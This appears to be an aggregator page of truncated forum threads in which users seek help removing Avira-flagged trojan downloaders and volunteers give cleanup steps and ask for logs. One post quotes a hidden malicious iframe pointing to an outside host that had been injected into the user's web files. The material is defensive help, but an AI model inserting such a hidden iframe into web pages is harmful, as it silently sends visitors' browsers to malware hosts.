JS/Dldr.Iframe.BO

Q: JS/Dldr.Iframe.BO

I have just had 3 security alert messages from AVIRA, don't know if it would have any connection:
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspicious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO

A: JS/Dldr.Iframe.BO

Q: <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hi Guys,

I have a problem with my computer.
It looks like I have a virus/malware inside my computer. I have tried to restore using System Restore; it seems it doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of the HTML/PHP/ASPX files on my computer.
I tried to delete it using Notepad, but when I open the file again, it is still there.

Can somebody please help me, because I still have a lot of work that must be finished Monday, and I can't continue to work if my computer still behaves like this.

Here is the log file I created for you guys using DDS. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the resul...

Q: TR/Dldr.Agent.bls.6

According to AntiVir I have this Trojan. It is very annoying as it closes the process of anything I try to do as far as removing it.

I am unable to run Hijackthis or Killbox without them closing within 2 seconds. I have run a scan with Ewido and Antivir as well as Ad-aware and they all find things and have removed them.

Every time that I reboot my PC then a file "winit.exe" is detected as this trojan by Antivir and I can delete it, but then it will just come back the next reboot.

I've been working with Avira to try to clear this but so far have failed, is there anyone who can help me out?

Edit: I booted into safe mode and was able to get a Hijackthis log file... Here is the contents...

A:TR/Dldr.Agent.bls.6

Q: TR/Dldr.iBill.C

New virus. I thought I fixed the previous one and now this is what comes up. I can't remove Yahoo's bundled antivirus etc. b/c it's not my computer. Really need help with this. Thanks much! =)


A:TR/Dldr.iBill.C

Closing duplicate thread, please continue here: http://forums.techguy.org/security/538154-tr-dldr-age-66267-c.html
 

Q:

the same as what I try I can not remove this

"" JS / Dldr.Agent.KO ""

I use Avira antivirus and have tried Malwarebytes Anti-Malware, CCleaner, fixwarout, etc., but without success. There is no solution to the problem when I search in Google, so I hope someone here can help me with the problem! Here is the problem: every time I open the explorer or a document such as a PDF, a warning pop-up snaps up. I will soon go crazy if I do not get this out; even if I move it to quarantine or delete it, it does not help. It's back the next time I open the explorer. Sorry for my poor English, hope someone can help me. Thank you in advance.
 

Q:

Hello everyone and thank you in advance for any help or suggestions you can provide me.

I have just recently, within the past 3 days, started getting warnings on my PC about a virus trying to enter or having entered. The notice gives me the option to deny access, delete, etc. I have read one of your postings here about the same virus, with its instructions. But I am not a computer-savvy person and I am not sure if I can follow the exact same instructions. This warning notice comes up constantly and I'm not sure what I'm supposed to be doing.
Can someone please take me through baby steps on how to do this...

Donna

PS **** The title is incorrect the name of the virus is : TR/Dldr.conhook.Gen

Q:

Hi
Avira started giving me a malware found message about "TR/Dldr.Lodomo.K" being found in a tmp file last night. After the message it follows up by saying that access to this file was denied. If I click remove it goes to scan and a brand new message about "TR/Dldr.Lodomo.K" found in a tmp file and that access is still denied shows up. The only way to not get a new alert is to ignore the current one. The tmp files keep on changing and on occasion, just to freak me out, it has multiple programs found with access still being denied. Then joys of all joys AntiVir Guard now says service stopped.

My bell internet service found an instance, said it fixed the problem and cheerfully suggested I restart. Avira of course had more alerts to share with me afterwards.

Very calmly and eagerly awaiting advice ^^


Q: Tr/dldr.adroar What Is This?

I'm running AntiVir PE Classic and AVG Anti-Spyware. I have run Spybot and Ad-aware. About 3 times a day I get a pop-up saying I have tr/dldr.adroar. I have always hit deny access when prompted and I wanted to know if anyone can tell me exactly what this is and what I should do.

A:Tr/dldr.adroar What Is This?

The only reference in Googling is mention in AntiVir's list of known malware. Suggest you scan with the online scanner in the link below. Let us know what it finds if anything.
http://www.bitdefender.com/scan8/ie.html

Q: Tr/dldr.wma.wimad.n

Windows XP
Firefox

I picked up the TR/Dldr.WMA.Wimad.N virus. I have the antivir software which detects it. I use the scan which deletes all the files but when I start my computer again I still seem to have the virus (I keep getting popups from my antivir telling me that they have detected new suspicious files)

I tried it in both safe mode and normal mode.

help me be free of this virus

A:Tr/dldr.wma.wimad.n

"they have detected new suspicious files"
the files are usually wma or mp3 downloaded from limewire or other P2P programs
you can download them faster than your AV can find them

Q: Spy-Agent.bf.dldr Cannot Get Rid Of

OK so I have a Trojan that I'd like to get rid of. I tried to do the 5 step process thing and I cannot do anything. Since this morning my javascript has been disabled, activex won't run and my security options keep changing. I tried to run panda active scan but somehow when I click the button it's non-responsive, nothing comes up and I can't open it in another tab. I also tried to download spy ware blaster and it said that my security settings do not allow me to download that file. I can hardly do anything in IE so I'm using Firefox. Please help, I don't know what to do. As soon as this is fixed I hope I can move on to the Trojan

A:Spy-Agent.bf.dldr Cannot Get Rid Of

Hi and welcome to TSF.

If you can use Firefox then download the following file (and HijackThis if possible). If not, use another computer for the download and transfer the programme using a USB stick or similar.

If Combofix refuses to run, try renaming it to some made up name and then run it.


Download ComboFix and save it to your desktop.

**Note: It is important that it is saved directly to your desktop**

CAUTION! Combofix should not be run without supervision - we cannot be held responsible if you end up having to re-install Windows!

1. Close any open browsers and physically disconnect from the Internet.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
See here for a guide to disabling AV, Firewall and Anti-malware programmes.
Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.
Please post the log C:\ComboFix.txt along with a fresh HijackThis Log for further review.

Do not mouseclick combofix's window whilst it's running. This may cause it to stall.

Q: TR/DLDR.AGE.66267.c

Hello, I am having a bit of a problem getting rid of a Trojan. I've used Antivir, Kaspersky, spybot, adware, registry cleaner, cwshreddar, ccleaner, super anti spyware, tweaknow, xoftspy, ewido, and some others. There was a lot more than just this trojan, but now I'm left with this. I know its location but it renews itself upon booting up. When I run the virus scan in safe mode it doesn't detect it... so maybe something in startup? Here's my hijackthis log. Need help pretty bad on this one.
Thanks!


A:TR/DLDR.AGE.66267.c

Q: TR/Dldr.ConHook.Gen

AntiVir found something named TR/Dldr.ConHook.Gen on my system, but it couldn't remove it for some reason. I ran VundoFix and it didn't find anything. Can someone please take a look at my HijackThis log and let me know if I still have a problem, and if so how I can fix it? Much thanks in advance!


A:TR/Dldr.ConHook.Gen

Getting assistance in the Spybot Forum. Thanks for whoever looked at this and I apologize for the duplicate post.

Q: TR/Dldr.Agent.CU HELP!

I've been infected with a trojan called TR/Dldr.Agent.CU; my virus scanner only detects it but won't remove it. Please help me get rid of it.


A:TR/Dldr.Agent.CU HELP!

Q: TR/Dldr.Swizzor.BD.1 ??

Hi there

I just got a virus warning called TR/Dldr.Swizzor.BD.1 ... does somebody know what this is? And how I can remove it? I made an antivirus check and selected the delete button ...

Greetings Oceanstar
 

A:TR/Dldr.Swizzor.BD.1 ??

Me again ....
Perhaps somebody can see something looking through the hijack :


Q: tr/dldr.Small.23

My AntiVir picked this up in my Pegasus Mail archive file today. File is: PIQCQY03...MS05-039.
It also said that it doesn't remove infected archive files, so how do I identify this and get rid of it? I went to the MS site to download their Malicious Software Removal Tool but found that it doesn't apply to WIN 98SE, which is what I have.
Has anyone else experience with this virus and how to deal with it? If you have, make your instructions SIMPLE 101 please. Thanks in advance!
 

A:tr/dldr.Small.23

What is the entire path to the locate of that file please?

Please do this. Click here to download HijackThis.

Close all open windows and open HijackThis. Click “Scan”. When the scan is finished, the scan button will change to “Save Log”. Click on “Save Log” and then save it to Notepad. Click on “Edit” – “Select all” – “copy” and then “paste” into the thread.

DO NOT FIX ANYTHING YET, most items that appear in the log are harmless or even needed.
 

Q: win32zlob.dldr

hi there,

i recently had the win32.zlob.dldr virus on my laptop with windows xp. it gave me a background with the "please click to activate anti-virus software" prompt which was blatantly fake.

i managed to get onto mozilla firefox and i started to search for antiviruses.

i used spybot search and destroy and when i finally managed to get it to open up it removed all sorts of crap from my laptop.

however, it could not remove one of the viruses because it was in my archives.

also, i could not get into task manager or use run or anything like that.

i am not the best with computers so i went onto google and i found help on how to get all of these back. it helped as i got run, taskmanager and most of my other vital things back. however i could not locate the existing virus and i still cannot get rid of that background and i still cannot get my windows security updates to switch on.

can anyone offer advice on how to fix this problem?

thanks.

gav.

A:win32zlob.dldr

Welcome to TSF

To get Expert Help with malware removal:

I recommend that you read this article… Simply click on the links to be re-directed.

"Having problems with spyware and pop-ups? - First Steps";
http://www.techsupportforum.com/secu...oval-help.html

Please follow the instructions very carefully; then, post all the requested logs and information; as instructed, in the
HiJackThis Log Help Forum.
http://www.techsupportforum.com/secu...this-log-help/

Please ensure that you create a new thread in the HiJackThis Log Help Forum;
not back here in this one.

When carrying out The 5 Steps,
http://www.techsupportforum.com/secu...oval-help.html

if you cannot complete any of them for whatever reason, just continue on with the next one until they are all completed.
However, it is extremely important to make mention of the fact that you could not complete any of the steps in your post to HiJackThis Log Help Forum.
http://www.techsupportforum.com/secu...this-log-help/

where an Analyst will assist you with other workarounds.

Once done, please be patient, as the Security Team Analysts are usually very busy; one of them will answer your request as soon as they can.

After your system has been verified as clean, if you are still experiencing those problems come back here and we will assist you further.

Read other 1 answers

hi
I'm fed up with this problem; this is a trojan file that I can't delete or quarantine.

need your help plz
the trojan name is: tr/dldr.small.js.1
and it's active in this directory: C:\Documents and Settings\*********\Local Settings\Temporary Internet Files\Content.IE5\AUBCNO9B\ads[1].js

I'm sure that you can help

A:tr/dldr.small.js.1 !!!!!!!!!!

hello ,

follow this link

(http://www.pandasecurity.com)

it is a free online scanner that will rid your system of viruses

you will want to look to the left of the main page for (Short Cuts) in this box you will want to select ( Free Online Scanner )

you will have to give a legit (e-mail address) & download a (active x) / the active x is stubborn so you may have to redo it a couple of times

do not buy anything it is free

now when you get ready to scan you will want to select to scan your local disk / harddrive

now be prepared for this scan is very intensive and can take 1hr to 2 hrs depending on the size of your harddrive and how full you have it

then get back to us and let us know if it solved it or not

Mike

Read other 1 answers

I have been having a problem with a recent virus or spyware that is on my computer. I use Virus Scan On Access, and every time that it pops up with the virus message it says that the virus: Spywarestrike.dldr has been deleted, but about 10 minutes later the same message will pop up. I have tried almost everything there is on the net to fix the problem. If anyone could help me I would appreciate it.
 

A:Spywarestrike.dldr

Read other 9 answers

Hello and thank you in advance for taking the time to help me with this problem.

My AntiVir program keeps catching the aforementioned trojan virus and even though I click to delete, it catches it again about an hour later. I have scanned with updated Spybot and Ad-aware programs, plus the daily Antivir scan. I also cleared my two temporary files folders.

There are a few annoying pornographic pop-up ads every now and then as well, but I forgot to write down the address bar info the last time it happened.

I have a 75 Gb hard drive with about 44% used.
Running Windows XP.
Here is my current hijack log. Please advise where to go from here.
Thank you,

Bob Hoagland
 

A:TR/Dldr virus will not go away!

Read other 8 answers

My computer has been infected with a Trojan and possibly multiple malware. I use Windows 7 and have AntiVir and MalwareBytes for virus protection. I have tried everything I can think of to remove this trojan. It keeps coming back, and it seems like a stronger virus each time, becoming more difficult to locate and harder to delete.

I'm unsure of what the source was, but the problem occurred shortly after two incidents:
1) I have a SeaGate external harddrive. Whenever I plug it into a computer, AntiVir will pop up every time. It won't detect anything, I've scanned the drive multiple times with various programs, and they pull up nothing. I assumed this was just a response to the AutoRun or a glitch of some sort... until now. I had recently transferred about 1gb of music from my harddrive to my computer when this problem started.

2) I visited a website (walmart.com) using Internet Explorer, and immediately upon opening the web page, AntiVir went crazy with detections.
They were all for 'Roaming Spyware', so I immediately closed the browser, ran CCleaner to empty the cache, and then ran MalwareBytes and AntiVir.
Neither program detected anything. Over the next couple of days I kept my computer off of the internet (unplugging it) and made sure to run my virus programs a few times before using it for anything other than just playing games offline.

For a few weeks my computer was running a little bit slow, but it wasn't slow enough for it to really bother me, a... Read more

A:TR/Dldr.Tracur.B.265

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please Do not Attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

In order for me to see the status of the infection I will need a new set of logs to start with.

Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

DeFogger: Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers
Click Yes to continue
A 'Finished!' message will ap... Read more

Read other 3 answers

Hi: I have a PC using Windows XP, partitioned into two drives. My browser is IE8. I also use Avira Antivir Personal and run it routinely. I have a DSL wi-fi connection. A couple of weeks ago, I picked up a virus that prevented me from loading any web page on my C: drive. Instead, I would get a IE8 message that said the internet connection could not be made. At that time, I also got a window that would pop up saying my PC was infected and I needed to scan it right away, please click yes or no. I recognized it as an obvious fake. I did NOT have the same problem with my D: drive. In addition, although I could not connect to the internet on my C: drive, I was able to use Outlook as normal to send/receive e-mail.

Attempting to run Avira on C: would not work. I switched to D: and updated Avira's db before running a scan. The scan found four suspicious files (I'm sorry I don't remember what they were), but no unwanted programs. I quarantined the lot, and rebooted. Unfortunately, I ran into the same problem all over again.

I again rebooted, but in safe mode. I turned off system restore, and ran an Avira scan again. Again, it found four suspicious files. I quarantined them, then rebooted in normal mode, rescanned with Avira. Nothing found. I turned system restore back on, attempted to connect to the internet via IE8, and still couldn't do it. At that point, I shut down for the night.

The next day, I booted up the PC, opened IE8, and right away got my regular home page. I chec... Read more

A:TR/Dldr.Zlob.iyt.1 virus

Hi

My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.

Please do not install or uninstall any programmes, or run any other scanners or software, unless I specifically ask you to do so. Also please copy and paste logs into the thread, rather than add them as attachments.




Combofix
We will begin with ComboFix.exe. Please visit this webpage for download links, and instructions for running the tool:

http://www.bleepingcomputer.com/comb...o-use-combofix

Please read all the information carefully!

You MUST disable your AntiVirus and AntiSpyware applications - please read this thread as a guide. They may otherwise interfere with our tools and interrupt the cleansing... Read more

Read other 19 answers

This weekend I had a hard attack of TROJANs. (TR/Drop , Buzu, Crypt to the Temp files)

I was trying to remove them and for 3 days I have had peace.

Today once again... What can I do with them??????????

What I did before:

With AVIRA (updated, free downloaded version) I moved them to quarantine, I have deleted all my Temp files, I have deleted all the cookies, internet sites ...

I was running without internet my PC on safe mode - "csökkentett üzemmód" if it is that ... - I have Hungarian version of Windows XP. And AVIRA once again. Avira did not find any detection.

After was a peace.

Today I have got TR/Dldr.Ag.35328.GA TROJAN and TR6Agent.AH.335 Trojan to WINDOWS/system32/kbdnet.dll

I have never had such things in my PC ... What can I do with them ... ???
Why are they coming back???

Please, help me, as I am not a big IT guru, I am so helpless now.

A:TR/Dldr.Ag.35328.GA TROJAN

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers

I have an infected file: "1 help eggs.exe" in "C:\Documents and Settings\User\Datos de programa\mp3 frag". It is also in the startup by that same name or "default.exe".

(http://virusscan.jotti.org): According to an ANTIVIR Antivirus online scan it is infected with "TR/Dldr.Swizzor.CO", but it doesn't exist in their online encyclopaedia. NOD32 found "probably a variant of Win32/TrojanDownloader.Swizzor" and NORMAN VIRUS CONTROL found "Lop.E".

It installs a Search Bar with my windows cached internet username on my Internet Explorer 6 and copies ads icons on my desktop. The search bar for example may say: "Computer, Members, Search, Forum, Personal, [My username], Forums" according to a possible keylogger or something that detects what I'm doing.

Seems to be pretty similar to "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADER.RS"

Microsoft Antispyware just blocked some of its actions, Ad-aware couldn't be less aware of it.

Here's the Hijackthis log:

Logfile of HijackThis v1.99.1
Scan saved at 02:19:29 a.m., on 09/08/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\W... Read more

A:New bad guy?: TR/Dldr.Swizzor.CO. How to remove it?

Hello incubus and welcome to the BC HijackThis forum. After reviewing your log I see a few items that require our attention. Please print these directions and then proceed with the following steps in order.

That is a LOP infection that comes from using Messenger Plus. It includes a LOP installer when the program is installed. To remove it, please print these directions and then proceed with the following steps in order.

Step #1
Download CCleaner and install it but do not run it yet.
Remove these installed programs using Add or Remove Programs in the Control Panel:
Click Start.
Click Control Panel.
Double-click Add or Remove Programs.
Look in the Currently installed programs box for each program listed below and if it is there:
Click on it to select it.
Click Change (or Change/Remove) button.
If you are prompted to confirm the removal of the program, click Yes.
Messenger Plus (any version)

Step #2
Start in Safe Mode Using the F8 method:
Restart the computer.
As soon as the BIOS is loaded begin tapping the F8 key until the boot menu appears.
Use the arrow keys to select the Safe Mode menu item.
Press the Enter key.

Step #3
Start HijackThis and click the Scan button to perform a scan. Look for the following items and click in the checkbox in front of each item to select it:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ikjxuhszxnqajuxcgw.com/DUIb/_gDlwtE...5f6EjhmTjmU.jpg
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =... Read more

Read other 1 answers

TR/Dldr.Swizzor.CO was found by antivir software on my computer after downloading messenger 3 by microsoft.

how would you go about deleting this?

it keeps popping up and the virus program can't seem to get rid of it?

A:Virus TR/Dldr.Swizzor.CO

This should work

Read other 1 answers

I have tried ad-aware, Spybot, Anti-Vir Guard, cleanmgr, House Call Antivirus, Panda Antivirus, Bit Defender, McAfee Stinger, a-squared antivirus, Trojan Hunter. But it still keeps popping up in different files. It keeps me from being able to change my backgrounds in the display properties. Here is my log from Hijack this. Hope I did it right this time:

Logfile of HijackThis v1.99.1
Scan saved at 5:31:01 AM, on 1/3/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Dell\Media Experience\PCMService.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\... Read more

A:Virus-tr/dldr.small.cpg.1

ktyson

Please follow the instructions in your original topic and respond to that thread only.
http://www.bleepingcomputer.com/forums/ind...mp;#entry423398

This thread is closed.

Read other 1 answers

My wife's computer has been infected with this Trojan and I have used your services in the past for my own computer with great results. I have followed the checklist procedure before posting this thread and here is the HJT Log after all preliminary scanning was done. Thanks in advance for your help.

-------------------------------------------------------------
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:10:12 PM, on 1/31/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.ex... Read more

A:Infected With Tr/dldr.agent.hkb

Hello Mattagin and welcome to the BC HijackThis forum. I don't see anything in the HJT log. Let's see what else we can find.

Before running the scan let's clean out the temporary folders. Download ATF Cleaner
Double-click ATF-Cleaner.exe to run the program.
Click Select All found at the bottom of the list.
Click the Empty Selected button.

If you use Firefox browser, do this also:
Click Firefox at the top and choose Select All from the list.
Click the Empty Selected button.
NOTE : If you would like to keep your saved passwords, please click No at the prompt.

If you use Opera browser, do this also:
Click Opera at the top and choose Select All from the list.
Click the Empty Selected button.
NOTE : If you would like to keep your saved passwords, please click No at the prompt.

Click Exit on the Main menu to close the program.

Now download WinPFind35u.exe to your Desktop and double-click on it to extract the files. It will create a folder named WinPFind35u on your desktop.
Note: You must be logged on to the system with an account that has Administrator privileges to run this program.
Close ALL OTHER PROGRAMS.
Open the WinPFind3u folder and double-click on WinPFind35U.exe to start the program (if you are running on Vista then right-click the program and choose Run as Administrator).
In the Drivers section click on Non-Microsoft.
Under Additional Scans click the checkboxes in front of the following items to select them:
Reg - BotCheck
File - Additional Folder Scans
Do not change any other settings.
Now... Read more

Read other 14 answers

I was browsing the internet when avira popped up with a trojan detection in my temporary internet file folder. The file name is w.js. Here is my HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:48:54 AM, on 10/3/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\a-squared Free\a2service.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\COMODO\Firewall\... Read more

A:Tr/dldr.agent.cro Trojan

Hello melbb,

Hello and Welcome to the forums! My name is Mas_pogi/Mark and I'll be glad to help you with your computer problems. HijackThis logs can take some time to research, so please be patient with me. I know that you need your computer working as quickly as possible, and I will work hard to help see that it happens. As I am still in training I will be helping you under supervision of our expert teachers, so there may be a delay between posts.

Please do not run any other tool until instructed to do so!
Please reply to this thread, do not start another!
Please tell me about any problems that have occurred during the fix.
Please tell me of any other symptoms you may be having as these can help also.
Please try as much as possible not to run anything while executing a fix.

With Regards,
mas_pogi

Read other 10 answers

Your help is greatly appreciated, Thankyou
DDS (Ver_09-01-07.01) - NTFSx86
Run by owner at 13:14:48.04 on Thu 2009-01-08
Internet Explorer: 6.0.2800.1106
Microsoft Windows 2000 Professional 5.0.2195.4.1252.1.1033.18.447.159 [GMT -6:00]
============== Running Processes ===============

C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\netdde.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\cisvc.exe
C:\Program Files\Common Files\Authentium\AntiVirus\dvpapi.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\hidserv.exe
C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
C:\Program Files\iolo\common\lib\ioloServiceManager.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Raxco\PerfectDisk\PDAgent.exe
C:\WINNT\system32\HPZipm12.exe
C:\Program Files\AT&T\AT&T Internet Security Suite\rpsupdaterR.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\system32\VTTimer.exe
C:\WINNT\syste... Read more

A:Virtumonde, TR/Dldr.Murlo.VN, and more

Howdy, my name is Hoov, and I will be helping you with your dilemma. I apologize for the delay in getting you help. Please make sure you watch this thread for responses. If you click the options tab at the top of your first post, you can select to track this thread.

Here is what I am asking you to do during the repair of your computer
*Tell me everything that you have done, if anything, to try and fix this problem.
*Please only use 1 forum to help clear up your problem. Posting on more than 1 and following instructions from more than 1 forum will cause those helping you to pull out their hair.
*Follow my instructions - If you can't for some reason, or if you don't understand something, please tell me. If you deviate from my instructions, tell me, it may make a difference on where we go. Don't install anything, even other programs that have nothing to do with security or malware, it could cause things to change, and I would never know it.
*Have faith. I will do all I can to get your computer working, and if I can't - someone else here will know something else to try.
*Stick with me to the end. My aim is to fix your problems, and give you the tools and knowledge to keep this from happening again.

Now onto trying to fix your computer.

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, f... Read more

Read other 3 answers

I've tried numerous spyware adware programs with no luck. I've also used HJT to remove some obvious items but still need some help.
Andrew

A:tr/dldr.conhook.gen malware

This is the HJT Log for the above problem:

Logfile of HijackThis v1.99.1
Scan saved at 7:04:31 PM, on 8/31/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avgnt.exe
D:\Up and Down\UTorrent V1.6.1\UTorrent V1.6.1\UTorrent V1.6.1.exe
C:\Program Files\Palm\Hotsync.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7... Read more

Read other 12 answers

I have been getting this riskware in which Ad-aware detects infected files such as A0000910.exe in the system restore folder. I then attempt to quarantine or delete the file. When I run the scan a few days later, it seems that it picks up a new file, but the ending digits change (eg. A000410.exe). I am thinking that I have a virus that is infecting my restore files, but when I scan, it just picks up the infected files, not the file/program that is infecting the restore files. Here is a line that is from Ad-aware Pro:

Logfile created: 6/16/2009 21:9:25
Lavasoft Ad-Aware version: 8.0.5
Description: C:\System Volume Information\_restore{428D0952-7789-4B99-B3BD-4F9A4332BCA1}\RP11\A0000910.exe Family Name: SPR/Dldr.DigStream Clean status: Success Item ID: 0 Family ID: 0

I hope that information helps with diagnosing the problem. Thank you!

